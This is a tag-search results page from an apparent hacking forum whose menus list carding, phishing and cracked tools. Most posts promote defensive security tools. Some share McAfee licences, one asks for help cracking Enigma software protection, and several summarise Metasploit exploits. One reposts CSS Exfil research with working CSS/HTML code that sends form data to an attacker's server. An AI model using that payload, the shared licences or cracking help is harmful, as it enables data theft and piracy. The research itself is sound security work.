Jump to content
YOUR-AD-HERE
HOSTING
TOOLS
SERVICE

Search the Community

Showing results for tags 'protection' or ''.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Staff Control
    • Staff Announcements
  • General doubts | News
    • General doubts
    • News
  • Hacking | Remote Administration | Bugs & Exploits
    • Hacking
    • Remote Administration
    • Bugs & Exploits
  • Programming | Web | SEO | Prefabricated applications
    • General Programming
    • Web Programming
    • Prefabricated Applications
    • SEO
  • Pentesting Zone
    • Pentesting Accounts
    • Reverse Engineering
  • Security & Anonymity
    • Security
    • Wireless Security
    • Web Security
    • Anonymity
  • Operating Systems | Hardware | Programs
    • Operating systems
    • Hardware
    • PC programs
    • iOS
    • Android
  • Graphic Design
    • Graphic Design
  • vBCms Comments
  • live stream tv
    • live stream tv
  • Marketplace
    • Sell
    • Services
    • Request
  • Pentesting Premium
    • Pentesting Accounts
  • Modders Section
    • Source Codes
    • Manuals | Videos
    • Tools
    • Others
  • PRIV8-Section
    • Exploits
    • Accounts|Dumps
    • Crypter|Binder|Bots
    • Tutorials|Videos
    • Cracked Tools
    • Make Money
    • More Tools
    • Databeses
    • Ebooks
  • Pentesting Zone PRIV8
    • Pentesting Accounts
    • Reverse Engineering
    • Cracker Preview Area
  • Carding Zone PRIV8
    • Carding
    • Phishing
    • Defacing
    • Doxing
    • Special User Premium Preview Area
  • Recycle Bin
    • Recycle
  • Null3D's Nulled Group

Product Groups

  • PRIV8
  • Advertising
  • Access Basic
  • Seller
  • Services

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


About Me

  1. A project dedicated to provide DDoS protection with proof-of-work PoW Shield provides DDoS protection on the OSI application layer by acting as a proxy that utilizes proof of work between the backend service and the end-user. This project aims to provide an alternative to general captcha methods such as Google’s ReCaptcha that has always been a pain to solve. Accessing a web service protected by PoW Shield has never been easier, simply go to the url, and your browser will do the rest of the verification automatically for you. PoW Shield aims to provide the following services bundled in a single webapp / docker image: proof of work authentication ratelimiting and ip blacklisting web application firewall Features Web Service Structure Proxy Functionality PoW Implementation Dockerization IP Blacklisting Ratelimiting Unit Testing WAF Implementation Multi-Instance Syncing (Redis) Changelog v2.1.2 Changes: Update dependencies [hide][Hidden Content]]
  2. x1 McAfee Total Protection | Product Expiry - 7/11/2023 [Hidden Content]
  3. x1 McAfee Total Protection | Product Expiry - 1/26/2024 [Hidden Content]
  4. The US Cybersecurity and Infrastructure Protection Agency (CISA) has released an open source incident response tool, which makes it easy to detect signs of malicious activity in Microsoft cloud environments. You can see the tool at this link:
  5. x2 McAfee Total Protection | Product Expiry - 5/7/2024 [Hidden Content]
  6. x8 McAfee Total Protection | Product Expiry - 8/25/2024 [Hidden Content]
  7. x 2 McAfee Total Protection | Product Expiry - 2/2/2024 [Hidden Content]
  8. Protect your end users and IT infrastructure against common ransomware attack vectors and efficiently monitor future threats Purchase of the print or Kindle book includes a free PDF eBook Key Features Learn to build security monitoring solutions based on Microsoft 365 and Sentinel Understand how Zero-Trust access and SASE services can help in mitigating risks Build a secure foundation for Windows endpoints, email, infrastructure, and cloud services Book Description If you're looking for an effective way to secure your environment against ransomware attacks, this is the book for you. From teaching you how to monitor security threats to establishing countermeasures to protect against ransomware attacks, Windows Ransomware Detection and Protection has it all covered. The book begins by helping you understand how ransomware attacks work, identifying different attack vectors, and showing you how to build a secure network foundation and Windows environment. You'll then explore ransomware countermeasures in different segments, such as Identity and Access Management, networking, Endpoint Manager, cloud, and infrastructure, and learn how to protect against attacks. As you move forward, you'll get to grips with the forensics involved in making important considerations when your system is attacked or compromised with ransomware, the steps you should follow, and how you can monitor the threat landscape for future threats by exploring different online data sources and building processes. By the end of this ransomware book, you'll have learned how configuration settings and scripts can be used to protect Windows from ransomware attacks with 50 tips on security settings to secure your Windows workload. What you will learn Understand how ransomware has evolved into a larger threat Secure identity-based access using services like multifactor authentication Enrich data with threat intelligence and other external data sources Protect devices with Microsoft Defender and Network Protection Find out how to secure users in Active Directory and Azure Active Directory Secure your Windows endpoints using Endpoint Manager Design network architecture in Azure to reduce the risk of lateral movement Who this book is for This book is for Windows administrators, cloud administrators, CISOs, and blue team members looking to understand the ransomware problem, how attackers execute intrusions, and how you can use the techniques to counteract attacks. Security administrators who want more insights into how they can secure their environment will also find this book useful. Basic Windows and cloud experience is needed to understand the concepts in this book. Table of Contents Ransomware Attack Vectors and the Threat Landscape Building a Secure Foundation Security Monitoring using Microsoft Sentinel and Defender Ransomware Countermeasures - Windows Endpoints, Identity, and SaaS Ransomware Countermeasures – Microsoft Azure Workloads Ransomware Countermeasures - Networking and Zero-Trust Access Protecting Information Using Azure Information Protection and Data Protection Ransomware Forensics Monitoring the Threat Landscape Best Practices for Protecting Windows from Ransomware Attacks [Hidden Content] [hide][Hidden Content]]
  9. hello friends, first I want to thank you for being part of the forum,I have here a serial generator made and protected by Enigma 6.xx,and I can't break this protection, I've tried to create a loader with the hwid enigma but I haven't been successful,could someone help me to do this please
  10. Stop Threats in Their Tracks Wherever They Attack Symantec’s innovative endpoint security solutions safeguard your laptops, desktops, mobile devices, servers, applications, cloud workloads, containers, storage devices—anywhere your data lives. Demand the Best Employees access data and applications from billions of devices with different capabilities, applications, and operating systems. Endpoint Security is the critical last line of defense in preventing cyber attacks from compromising those devices and in protecting your sensitive information from falling into the wrong hands. That’s why you need the best possible protection everywhere your data lives. That’s why you need Symantec. Our portfolio includes solutions for: Endpoint Security Server Security Endpoint Management [Hidden Content] [hide][Hidden Content]]
  11. A project dedicated to provide DDoS protection with proof-of-work PoW Shield provides DDoS protection on the OSI application layer by acting as a proxy that utilizes proof of work between the backend service and the end-user. This project aims to provide an alternative to general captcha methods such as Google’s ReCaptcha that has always been a pain to solve. Accessing a web service protected by PoW Shield has never been easier, simply go to the url, and your browser will do the rest of the verification automatically for you. PoW Shield aims to provide the following services bundled in a single webapp / docker image: proof of work authentication ratelimiting and ip blacklisting web application firewall How it Works So basically, PoW Shield works as a proxy in front of the actual web app/service. It conducts verification via proof-of-work and only proxies authorized traffic through to the actual server. The proxy is easily installable and is capable of protecting low-security applications with a WAF. Here’s what happens behind the scenes when a user browses a PoW Shield-protected webservice: The server generates a random hex-encoded “prefix” and sends it along with the PoW Shield page to the client. Browser JavaScript on the client-side then attempts to brute-force a “nonce” that when appended with the prefix, can produce a SHA256 hash with the number of leading zero-bits more than the “difficulty” D specified by the server. i.e. SHA256(prefix + nonce)=0…0xxxx (binary, with more than D leading 0s) Client-side JavaScript then sends the calculated nonce to the server for verification, if verification passes, the server generates a cookie for the client to pass authentication. The server starts proxying the now authenticated client traffic to the server with WAF filtering enabled. Features Web Service Structure Proxy Functionality PoW Implementation Dockerization IP Blacklisting Ratelimiting Unit Testing WAF Implementation Multi-Instance Syncing (Redis) Changelog v2.0 Support integration with PoW Phalanx Controller Update dependencies [hide][Hidden Content]]
  12. Description PoW Shield provides DDoS protection on OSI application layer by acting as a proxy that utilizes proof of work between the backend service and the end user. This project aims to provide an alternative to general captcha methods such as Google's ReCaptcha that has always been a pain to solve. Accessing a web service protected by PoW Shield has never been easier, simply go to the url, and your browser will do the rest of the verification automatically for you. PoW Shield aims to provide the following services bundled in a single webapp / docker image: proof of work authentication ratelimiting and ip blacklisting web application firewall Features Web Service Structure Proxy Functionality PoW Implementation Dockerization IP Blacklisting Ratelimiting Unit Testing WAF Implementation Multi-Instance Syncing (Redis) PoW Shield V1.4.0 Latest Changes: Add SSL support Update dependencies Bug Fix: Solve redirection loop bug crashing browsers [hide][Hidden Content]]
  13. TokenGuard, protect your account, prevent token steal. Totally free and open source. TokenGuard is a program written in Python that aims to mitigate almost 100% the theft of Discord Tokens on your computer. The main features are: Simple GUI: TokenGuard has a graphic interface that is too simple, not very invasive and easy to use, which aims to adapt to all types of users. Constant Protection: The program is in charge of cleaning the traces of the Discord Token constantly, guaranteeing its safety at all times. Low Consumption: Despite the fact that it is constantly running, the consumption of both the CPU and RAM is very low.. [hide][Hidden Content]]
  14. ConfuserEx Protection Finder 1.0 - by MindSystem - ConfuserEx Protection Finder Just Drag n drop file... [hide][Hidden Content]]
  15. Why We see ransomware delete all shadow copies using vssadmin pretty often. What if we could just intercept that request and kill the invoking process? Let’s try to create a simple vaccine. Raccine 1.4.4 fix broken installer [hide][Hidden Content]]
  16. Avira Prime (antivirus, VPN, optimization) for 3 months for free. Protection for 5 devices Free 3-month Avira Prime subscription for 5 devices (Windows, MacOS, Android and iOS supported). Get all of Avira's premium software including antivirus, VPN, PC Optimization and more [hide][Hidden Content]]
  17. Raccine A Simple Ransomware Protection Why We see ransomware delete all shadow copies using vssadmin pretty often. What if we could just intercept that request and kill the invoking process? Let’s try to create a simple vaccine. Changelog v1.3 Beta feat: YARA in-memory scanning fix: several bug fixes [hide][Hidden Content]]
  18. Whonix : Privacy Protection, Anonymity Online, Anonymous Operating System Whonix is a free and open-source desktop operating system (OS) that is specifically designed for advanced security and privacy. Based on Tor, Debian GNU/Linux and the principle of security by isolation Download : [Hidden Content]
  19. Enterprise Remote Desktop Security. Intelligent Solutions for the Modern Workspace. Offices are decentralizing. Remote offices and mobile employees are at an all-time high. With the increased flexibility that comes with working in a remote environment, there are also increased risks. Malware and Ransomware run rampant on the internet. Login information is vulnerable. Strong passwords and careful users just aren’t enough to ensure security anymore. RDS-Knight is the intelligent solution. With RDS-Knight, Administrators can use a wide array of flexible tools to control access to remote servers. Designed by security experts and updated regularly, RDS-Knight stays on the cutting edge of remote desktop security. With the recent update to Version 4.0, RDS-Knight continues to lead the way in bringing easy to manage, highly configurable security solutions to businesses around the world. [Hidden Content] [HIDE][Hidden Content]]
  20. Introducing CSS Exfil Several months ago I began tinkering with Chrome's XSS auditor looking for bypasses. One remote injection method which reliably got through Chrome's filter was CSS injection. By utilizing injected CSS, an attacker essentially has complete control over the look-and-feel of a page. I also discovered an attacker can leverage CSS to steal form data. By utilizing CSS alone, browser protections like NoScript can't block the egress of data (although NoScript's XSS auditor is more effective than Chrome at blocking some of the injection Proof of Concept attacks detailed below). While CSS injection is not a new vulnerability, using CSS as the sole attack vector to reliably exfiltrate data - to my knowledge - has never been presented. I am also not aware of any effective method previously documented to guard end users against such attack - other than to block CSS, which is not a practical solution. Related Work The only mention I could find of a similar egress method, is [Hidden Content], which demonstrates how CSS can be used to beacon an attacker when certain data is present on a web page. (Admittedly, I found this page later when researching possible mitigation techniques.) A couple weeks ago I also became aware of a GitHub project dubbed [Hidden Content], which uses CSS to track web users. Methods of Exploitation There are a variety of attack scenarios which can leverage CSS Exfil, including: Reflected or stored code injection flaws (e.g. any page vulnerable to XSS) Hijacked or malicious 3rd party resources intentionally or accidentally included within the DOM (Document Object Model) of the target element. e.g.: Web tracker snippits Remarketing code Advertisements which are not not encapsulated within an iframe Web development plugins/libraries/frameworks Malicious or hijacked browser extensions Anatomy of the Attack The CSS Exfil attack centers around the CSS 'value selectors', which can be used to parse HTML tag attribute data. Here is a summary of these selectors: [attribute=value] [foo=bar] Selects all elements with foo="bar" [attribute~=value] [foo~=bar] Selects all elements with a foo attribute containing the word "bar" [attribute|=value] [foo|=bar] Selects all elements with a foo attribute value starting with "bar" [attribute^=value] [foo^="bar"] Selects all elements with a foo attribute value starting with "bar" [attribute$=value] [foo$="bar"] Selects all elements with a foo attribute value ending with "bar" [attribute*=value] [foo*="bar"] Selects all elements with a foo attribute which contains the substring "bar" This simple example demonstrates how these selectors can be abused: <style> #username[value="mikeg"] { background:url("[Hidden Content]"); } </style> <input id="username" value="mikeg" /> In the above example, when the HTML/CSS is rendered in a web browser, a background image is loaded on a remote host controlled by the attacker, indicating the value of the input is 'mikeg'. To make the attack more useful, additional text parsing is required. Below are several proof of concept exploits demonstrating the variety, scope, and severity of potential attacks. Proof of Concept Basic CSS Exfil example which shows how malicious CSS/HTML can be used to leak page data. <html> <head> <style> #username[value*="aa"]~#aa{background:url("[Hidden Content]");}#username[value*="ab"]~#ab{background:url("[Hidden Content]");}#username[value*="ac"]~#ac{background:url("[Hidden Content]");}#username[value^="a"]~#a_{background:url("[Hidden Content]_");}#username[value$="a"]~#_a{background:url("[Hidden Content]");}#username[value*="ba"]~#ba{background:url("[Hidden Content]");}#username[value*="bb"]~#bb{background:url("[Hidden Content]");}#username[value*="bc"]~#bc{background:url("[Hidden Content]");}#username[value^="b"]~#b_{background:url("[Hidden Content]_");}#username[value$="b"]~#_b{background:url("[Hidden Content]");}#username[value*="ca"]~#ca{background:url("[Hidden Content]");}#username[value*="cb"]~#cb{background:url("[Hidden Content]");}#username[value*="cc"]~#cc{background:url("[Hidden Content]");}#username[value^="c"]~#c_{background:url("[Hidden Content]_");}#username[value$="c"]~#_c{background:url("[Hidden Content]");} </style> </head> <body> <form> Username: <input type="text" id="username" name="username" value="<?php echo $_GET['username']; ?>" /> <input id="form_submit" type="submit" value="submit"/> <a id="aa"><a id="ab"><a id="ac"><a id="a_"><a id="_a"><a id="ba"><a id="bb"><a id="bc"><a id="b_"><a id="_b"><a id="ca"><a id="cb"><a id="cc"><a id="c_"><a id="_c"> </form> </body> </html> The above example isn't all that realistic but it demonstrates the fundamentals of the CSS Exfil attack. When a user enters any string consisting of the letters 'a' 'b 'c', specific elements will be styled with a non-existent background image at a remote attacker URL. For the attack to succeed three conditions need to be in place: Upon visiting hxxps://victim[.]host/css-exfil-poc1[.]php?username=abcab, the attacker will receive data like this. 127.0.0.1 - - [25/Jan/2018:22:36:46 -0500] "GET /ab HTTP/1.1" 404 22 127.0.0.1 - - [25/Jan/2018:22:36:46 -0500] "GET /a_ HTTP/1.1" 404 22 127.0.0.1 - - [25/Jan/2018:22:36:46 -0500] "GET /bc HTTP/1.1" 404 22 127.0.0.1 - - [25/Jan/2018:22:36:46 -0500] "GET /_b HTTP/1.1" 404 22 127.0.0.1 - - [25/Jan/2018:22:36:46 -0500] "GET /ca HTTP/1.1" 404 22 Which can be re-assembled like this: a # a_ ab # ab abc # bc abca # ca abcab # _b The malicious CSS utilizes pattern matching for two character combinations ('aa', 'ab', 'ac'...) as well as detection of the first and last letter of the string ('a_' & '_a' callbacks). This method provides a reliable method of reconstructing data. The limitation is that repeating patterns may not always be apparent and reconstruction may sometimes require human intelligence if the data decodes to multiple strings. Why not use three character matching or longer? In a word: practicality. If the structure of the data can be anticipated it may be possible to use longer strings, which I will illustrate below. The more targeted the attack the more it becomes possible to make better data predictions and reduce the CSS footprint. But in general, the two-character first/last-character approach provides the best performance to attack footprint. All two letter English alphabet lower case alphabet permutations work out to P(26,2) = 650. Three character permutations increases the footprint to P(26,3) = 15,600, making it much more unlikely that Condition #2 will be possible. This table describes the attributes of various attack alphabet. Alphabet Regex Calculation Required Elements Estimated CSS Payload Numeric [0-9] P(10,2) + (10 * 2) 110 7.7 KB Lowercase [a-z] P(26,2) + (26 * 2) 702 49.14 KB Lower/uppercase [A-Za-z] P(52,2) + (52 * 2) 2,756 192.92 KB Lower/uppercase / Numeric [A-Za-z0-9] P(62,2) + (62 * 2) 3,906 273.42 KB Lower/uppercase / Numeric / 32 symbols P(94,2) + (92 * 2) 8,926 624.82 KB Depending where the targeted data element resides within a page, large alphabets may be possible without HTML injection. Running document.getElementsByTagName('*').length; in your browser console will display the total number of DOM (Document Object Model) elements on a page, which can provide an upper bound. For example, my homepage (at the time of this writing) has ~750 DOM elements in total. A test of Slashdot yielded ~2,100 elements and Google News yielded ~6,900 elements! That's not to say that each DOM element can be properly referenced by the target element, but it gives an upper bound on what may be possible without additional DOM injection. Condition #1: The data being parsed must be present on page load Condition #2: There must be one or more elements which can be referenced via a CSS selector relative to the data element Condition #3: The element must be styled with a CSS property which takes a URL (e.g. background / background-image, list-style / list-style-image, or cursor). More info && Download [Hidden Content]
  21. This Metasploit module exploits an Authenticated user with permission to upload and manage media contents can upload various files on the server. Application prevents the user from uploading PHP code by checking the file extension. It uses black-list based approach, as seen in octobercms/vendor/october/rain/src/Filesystem/ Definitions.php:blockedExtensions(). This module was tested on October CMS version version 1.0.412 on Ubuntu. View the full article
  22. This Metasploit module exploits a flaw in the WSReset.exe Windows Store Reset Tool. The tool is run with the "autoElevate" property set to true, however it can be moved to a new Windows directory containing a space (C:\Windows \System32\) where, upon execution, it will load our payload dll (propsys.dll). View the full article
  23. This Metasploit module exploits a flaw in the WSReset.exe file associated with the Windows Store. This binary has autoelevate privs, and it will run a binary file contained in a low-privilege registry location. By placing a link to the binary in the registry location, WSReset.exe will launch the binary as a privileged user. View the full article
  24. Microsoft Office365 and ProPlus build 16.0.11901.20204 suffers from code execution and protection bypass vulnerabilities. View the full article
  25. WhatWaf is an advanced firewall detection tool whose goal is to give you the idea of “There’s a WAF?”. WhatWaf works by detecting a firewall on a web application and attempting to detect a bypass (or two) for said firewall, on the specified target. Features Ability to run on a single URL with the -u/--url flag Ability to run through a list of URL’s with the -l/--list flag Ability to detect over 40 different firewalls Ability to try over 20 different tampering techniques Ability to pass your own payloads either from a file, from the terminal, or use the default payloads Default payloads that are guaranteed to produce at least one WAF triggering Ability to bypass firewalls using both SQLi techniques and cross-site scripting techniques Ability to run behind multiple proxy types (socks4, socks5, http, https, and Tor) Ability to use a random user agent, personal user agent, or custom default user agent Auto-assign protocol to HTTP or ability to force protocol to HTTPS A built-in encoder so you can encode your payloads into the discovered bypasses More to come… Changelog v1.5.4 minor update to Cloudflare detection via issue #299 [HIDE][Hidden Content]]
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.